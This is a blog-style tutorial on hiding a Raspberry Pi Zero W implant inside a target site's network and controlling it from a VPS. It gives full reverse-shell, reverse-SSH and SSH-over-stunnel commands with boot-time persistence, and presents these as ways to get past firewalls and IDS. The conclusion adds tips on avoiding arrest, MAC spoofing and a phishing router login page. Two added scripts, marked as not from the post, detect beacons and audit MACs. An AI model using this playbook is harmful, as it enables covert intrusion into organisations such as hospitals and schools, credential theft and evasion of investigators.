Infiltrating an on-site local network with a Raspberry Pi Zero W (creating a tunnel)


1. Introduction

In this post I will describe how you can infiltrate a local network by using a hardware implant such as a Raspberry Pi. This is very useful if you want to perform an attack on site, e.g. at a company, shopping center, hospital, school, etc. The goal is to install a small piece of hardware such as a Raspberry Pi, which lets us connect to the local network and perform the attack from anywhere.

You can use different models such as the Raspberry Pi 2, 3 or Zero W. The Raspberry Pi 3 allows connection to the network over wifi or over an RJ45 port, while the Raspberry Pi Zero W, for example, only allows connection over wifi. But the Raspberry Pi Zero W is a lot smaller, cheaper (only $10) and consumes less power. Lower power consumption is also an advantage if you have no power socket during the attack and need to run it from a battery: it will last longer.

For the purpose of this post I will use the Raspberry Pi Zero W.

In the text below I will show you how to prepare the Raspberry Pi Zero W for the attack and how to tunnel all traffic from the Pi to a VPS server. After that we will be able to connect to the VPS server over SSH and control the Raspberry Pi.

I will show you three different ways to do the tunneling: over a raw TCP connection, over SSH, and over an SSH-in-SSL tunnel. Raw TCP is technically the easiest, while SSH and SSH/SSL are a little bit harder. But do not be afraid, it is not rocket science.

2. Preparing the Raspberry Pi Zero W

2.1. Burning Kali Linux onto the SD card

If you already have Kali Linux installed on your Pi, you can skip this section.

I downloaded the Kali Linux image by Re4son from the following link, but you can also download it from the official site:

https://re4son-kernel.com/re4son-pi-kernel/

Then I used Win32DiskImager to write the .img file to the SD card. This creates two partitions on the SD card. Be aware that one of the partitions is formatted as EXT4, so you cannot see/read it on a Windows machine.

2.2. Set up wifi to connect to the network at boot

Now we will set up wifi so that each time we boot the Raspberry Pi Zero W it automatically connects to the wifi. Note that you will need the wifi credentials. You can also connect it over an Ethernet connector, but in that case you additionally need a micro USB Ethernet adapter, whereas the Raspberry Pi 3 already has one built in.

For this setup you will need to plug the SD card into any Linux machine.

Browse to the file /etc/network/interfaces and add the following lines:

auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

Next, in the file /etc/wpa_supplicant/wpa_supplicant.conf add:

network={
ssid="<wifi name>"
psk="<wifi password>"
proto=RSN
key_mgmt=WPA-PSK
pairwise=CCMP
auth_alg=OPEN
}

2.3. Start the SSH server at boot

To automatically enable SSH on the Raspberry Pi, add the following line to /etc/rc.local:

sudo /etc/init.d/ssh start

That's it. As soon as we power on the Raspberry Pi Zero W it will boot and start the SSH server. Since we also set up the wifi connection at boot, we can connect to the Raspberry Pi over SSH with the following command and the default password toor:

ssh root@<Raspberry Pi IP>

To find the Raspberry Pi Zero W's address we can run a simple scan of the network:

nmap -sP 192.168.1.0/24

Note: do not forget to change the default password after the first boot (passwd).

3. Preparing the VPS server

For the purpose of this post I created a VPS server (Ubuntu) on DigitalOcean (digitalocean.com). During setup I added my SSH public key, so I can connect to the server from my Linux machine over SSH. That's it.

4. Approach 1 – create a tunnel over raw TCP

This is the easiest way to create a tunnel between the Raspberry Pi Zero W and the VPS server, so that you can control the Pi through the server.

We need only a one-line command on each side, the Raspberry Pi Zero W and the VPS server.

On the Raspberry Pi Zero W: bash -i >& /dev/tcp/<VPS server IP>/5555 0>&1

On the VPS server: nc -vv -l -p 5555

Of course, during an on-site attack we do not have a monitor and keyboard hooked up to the Raspberry Pi Zero W, so we need to make sure this command runs as soon as we power the Raspberry Pi Zero W on. For this we will create a service that does the heavy lifting for us.

4.1. Set up a service on the Raspberry Pi

First, we create a bash file (I named it service.sh) and save it in the folder /etc/systemd/system:

#!/bin/bash
bash -i >& /dev/tcp/<VPS server IP>/5555 0>&1

Then we create a service file (I named it system.service) and save it in the same folder /etc/systemd/system:

[Unit]
Description=Run script with systemd

[Service]
ExecStart=/etc/systemd/system/service.sh
Restart=always
TimeoutStartSec=20
RestartSec=20

[Install]
WantedBy=multi-user.target

Then set permissions for both newly created files (the unit file itself does not need the execute bit, but it does no harm):

chmod +x service.sh
chmod +x system.service

Reload the daemon:

systemctl daemon-reload

Start the service:

systemctl start system.service

And finally, enable the service to start at every boot:

systemctl enable system.service

Now reboot the Raspberry Pi Zero W and try to connect to it from the VPS server with the following command:

nc -vv -l -p 5555

That's the whole "magic". Now you can control a Raspberry Pi Zero W connected to any network (provided you have the wifi password and physical access to the victim network). And whenever we lose the connection for any reason, the Raspberry Pi will connect back to the VPS server.

I would use this approach when I know that the target site has no system admin and does not put much effort into security. You need to know that this raw TCP traffic is not encrypted, so it can easily be captured and detected.

So in the following text I will show you a slightly more secure approach using the SSH protocol. Once a connection between the Raspberry Pi Zero W and the VPS server is established, the data transmitted between them is encrypted.
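From the defender's side, the restart loop in the unit above (Restart=always, RestartSec=20) is exactly what makes this approach easy to spot in egress logs: the same internal host re-opens a connection to the same external IP on the same unusual port at a fixed interval. The following detection script is an added example, not code from the post; it runs over constructed log lines in a simple key=value format, and the allowed-port set and the 203.0.113.10 address are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed egress-log sample (not from the post). 192.168.1.57 re-opens a
# session to 203.0.113.10:5555 every 20 s, which is what the unit above
# (Restart=always, RestartSec=20) produces whenever the shell is cut off.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z src=192.168.1.23 dst=203.0.113.10 dport=443 proto=tcp
2024-05-01T10:00:05Z src=192.168.1.57 dst=203.0.113.10 dport=5555 proto=tcp
2024-05-01T10:00:25Z src=192.168.1.57 dst=203.0.113.10 dport=5555 proto=tcp
2024-05-01T10:00:45Z src=192.168.1.57 dst=203.0.113.10 dport=5555 proto=tcp
2024-05-01T10:01:05Z src=192.168.1.57 dst=203.0.113.10 dport=5555 proto=tcp
2024-05-01T10:01:10Z src=192.168.1.23 dst=198.51.100.8 dport=80 proto=tcp
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
                     r"dport=(?P<dport>\d+) proto=\w+$")
EXPECTED_PORTS = {53, 80, 443}  # assumed egress policy for this example

def parse(log):
    """Yield (timestamp, src, dst, dport) for every well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m["src"], m["dst"], int(m["dport"])

def find_beacons(log, min_hits=3, max_jitter=2.0):
    """Return (src, dst, dport, interval_s) for flows to unexpected ports that
    reconnect at a steady interval, i.e. look like a restarting reverse shell."""
    flows = defaultdict(list)
    for ts, src, dst, dport in parse(log):
        if dport not in EXPECTED_PORTS:
            flows[(src, dst, dport)].append(ts)
    alerts = []
    for key, stamps in flows.items():
        if len(stamps) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = sum(gaps) / len(gaps)
        if max(abs(g - mean) for g in gaps) <= max_jitter:
            alerts.append((*key, round(mean)))
    return alerts

if __name__ == "__main__":
    for src, dst, dport, every in find_beacons(SAMPLE_LOG):
        print(f"beacon: {src} -> {dst}:{dport} every ~{every}s")
```

The SSH and stunnel variants later in the post hide the shell contents, but the same reconnect rhythm survives, so timing-based checks like this one still apply to them.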

5. Approach 2 – create a tunnel with SSH

For this we need to set up key-based authentication, which lets the Raspberry Pi Zero W open an SSH connection to the VPS server.

On the Raspberry Pi Zero W we use ssh-keygen, which creates a public and a private key:

ssh-keygen -f ~/.ssh/vps -t rsa -N ''

Copy the contents of the public key (in this case it is written to ~/.ssh/vps.pub) into authorized_keys in the /root/.ssh directory on the VPS server, and restart the ssh service:

service ssh restart

Now just try to connect from the Raspberry Pi Zero W to the VPS server over SSH with the following command, to see that the key works:

ssh -i ~/.ssh/vps root@<VPS server IP>

If you connected to the VPS server successfully, everything works. You can disconnect with the command exit.

Now that SSH is set up correctly, we can tunnel the connection from the Raspberry Pi to the VPS server by running the following commands:

On the Raspberry Pi Zero W: ssh -i /root/.ssh/vps -nNT -R 5555:localhost:22 <server IP>

On the VPS server: ssh root@localhost -p 5555

Again, as in the previous approach, we need to start that command on the Raspberry Pi Zero W at boot. We can use the same method as in approach 1, by creating a service (section 4.1). After you have done that, reboot the Raspberry Pi Zero W and run ssh root@localhost -p 5555 on the VPS server. You should get a shell which lets you command the Raspberry Pi remotely.

Ok. Now that we have gone through two different tunneling approaches (raw TCP and SSH), I will briefly explain why I included the next approach (SSH/SSL) in this post.

Let's imagine that we are attacking some big company, which has an IT department with system admins and some sort of IDS, IPS and firewall doing deep packet inspection, regular scanning, etc. Networks of that kind usually block port 22. Also, if you run SSH over e.g. port 443, their systems would identify it and drop the traffic. This is why I chose stunnel, so I can tunnel the SSH connection in a way that looks like SSL traffic. We will establish an SSL tunnel over port 443, so it looks like normal SSL traffic and consequently the firewall permits it. Enough briefing, let's do it.

6. Approach 3 – create a tunnel with SSH over SSL

First of all we need to generate a private and public key on the Raspberry Pi Zero W and put the public key on the VPS server, as we did in the previous approach (SSH). I will not write it down again, to avoid doubling the text and work.

Next we need to install some prerequisites.

6.1. Set up the Raspberry Pi Zero W

Install stunnel:

apt-get install stunnel4

Install autossh:

apt-get install autossh

After that, create the stunnel configuration file /etc/stunnel/stunnel.conf and add the following:

pid = /var/run/stunnel.pid
client = yes

[ssh]
accept = 443
connect = <VPS server IP>:443

We need to ensure that the tunnel starts automatically. Add the following to the /etc/default/stunnel4 file:

ENABLED=1

Then we need to make the Raspberry Pi Zero W establish the SSH tunnel automatically whenever the network interface comes up, by creating the file /etc/network/if-up.d/autossh with the following content:

#!/bin/sh
su -c "autossh -p 443 -f -N -R *:5555:localhost:22 root@localhost -o LogLevel=error -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no" root

Now make this file executable:

chmod +x /etc/network/if-up.d/autossh

Finally, reboot the Raspberry Pi Zero W.

6.2. Set up the VPS server

Install stunnel:

apt-get install stunnel4

Open the ports (allow 22 before enabling the firewall, so you do not lock yourself out of the server):

ufw allow 22
ufw allow 443
ufw enable

Since we will be tunneling SSH traffic inside SSL (HTTPS) traffic, we need to generate another key pair, which will be used to encrypt and decrypt the SSL traffic:

openssl genrsa 2048 > /etc/stunnel/stunnel.key
openssl req -new -key /etc/stunnel/stunnel.key -x509 -days 365 -out /etc/stunnel/stunnel.crt
cat /etc/stunnel/stunnel.crt /etc/stunnel/stunnel.key > /etc/stunnel/stunnel.pem

After that, create the stunnel configuration file /etc/stunnel/stunnel.conf and add the following:

pid = /var/run/stunnel.pid
cert = /etc/stunnel/stunnel.pem

[ssh]
accept = 443
connect = 127.0.0.1:22

We need to ensure that the tunnel starts automatically and listens on port 443. Add the following to the /etc/default/stunnel4 file:

ENABLED=1

Finally, reboot the VPS server.

That's it. To get control over the Raspberry Pi Zero W, run the following on the VPS server:

ssh -p 5555 root@localhost

7. Conclusion

Finally, I have explained three different ways to control the Raspberry Pi Zero W remotely through the VPS server, and consequently from anywhere in the world. My recommendation is to stick to the last, SSH/SSL, approach in every case.

I hope that you will use this only for educational purposes and not for illegal shit. But anyway, I will give you some additional tips on how to avoid detection. Remember that this will not protect you 100%; there is always a way to track you down. Ok, if you really want to hide your traces you should never buy a VPS server with your real ID and pay for it with a credit card. There are plenty of VPSs which you can buy with bitcoin. Next, never connect to the VPS server from home. Go to a public place and connect from there. For the connection to the VPS use a freshly installed virtual machine, and after making some noise delete it. Make sure no public camera catches you, leave your phone at home and pray to God that they will not catch you :).

Ok, I will also add some additional tips for serious penetration testers. If we try to attack some big, serious company by infiltrating a Raspberry Pi into their network, it is just a question of time before the gadget is noticed. Why? Every serious system admin performs regular scanning/mapping of the network, and as soon as they run e.g. nmap they will notice the new hardware with the name Raspberry Pi. And the game is over. So I strongly recommend that you spoof the MAC address. Check common vendors' MAC addresses and use one of them. For example, I would give my Raspberry Pi a Cisco router MAC address. I would also host a web page imitating the default router login page on my Raspberry Pi and set it up as a phishing page. So in the end it would look like a real, legitimate router. And if you are lucky, some "noob" admin would try to log in to it. That would be a pure win for the penetration tester.

It may also be a smart move to take two Raspberry Pis to the audit: one spoofed as a router and one as e.g. a printer, just in case they detect you and shut one of your gadgets down.
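To show the admin's side of the scanning described above, here is an added example (not from the post) that audits arp-scan style output against an approved-device inventory. The inventory, the scan lines and the labels are constructed for the example; the b8:27:eb and dc:a6:32 prefixes are the Raspberry Pi OUIs that an nmap vendor lookup matches, and 00:00:0c is a Cisco prefix. It also shows why a spoofed vendor prefix alone does not save the implant: a device missing from the inventory is flagged whatever its OUI says.

```python
# Constructed arp-scan style output: "ip<TAB>mac<TAB>label" (not from the post).
# 192.168.1.57 is an implant with a genuine Raspberry Pi MAC; 192.168.1.58 is an
# implant whose MAC was spoofed to a Cisco prefix, as the post suggests.
SAMPLE_SCAN = """\
192.168.1.1\t00:11:22:33:44:55\tcore-router
192.168.1.23\t3c:5a:b4:aa:bb:cc\tws-01
192.168.1.57\tb8:27:eb:12:34:56\tkali
192.168.1.58\t00:00:0c:99:88:77\tcisco-like
"""

# Raspberry Pi Foundation / Raspberry Pi Trading OUIs (first three octets).
RPI_OUIS = {"b8:27:eb", "dc:a6:32"}

# Assumed inventory of approved MAC addresses -> asset name (constructed).
INVENTORY = {
    "00:11:22:33:44:55": "core-router",
    "3c:5a:b4:aa:bb:cc": "ws-01",
}

def audit_scan(scan, inventory=INVENTORY):
    """Return [(ip, mac, reasons)] for every host that needs a closer look.

    Two independent checks: a known implant OUI, and absence from the
    inventory. The second one catches the device even if the OUI is spoofed."""
    findings = []
    for line in scan.splitlines():
        ip, mac, _label = line.split("\t")
        mac = mac.lower()
        reasons = []
        if mac[:8] in RPI_OUIS:
            reasons.append("raspberry-pi-oui")
        if mac not in inventory:
            reasons.append("not-in-inventory")
        if reasons:
            findings.append((ip, mac, reasons))
    return findings

if __name__ == "__main__":
    for ip, mac, reasons in audit_scan(SAMPLE_SCAN):
        print(f"{ip} {mac}: {', '.join(reasons)}")
```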

I also recommend that you do not run the VPS server as root. If your Raspberry Pi is detected, they can copy the private key from the SD card and use it to pwn your VPS very easily.

There are also many other useful tips, but I will leave them for another occasion. The conclusion is already too long anyway :).
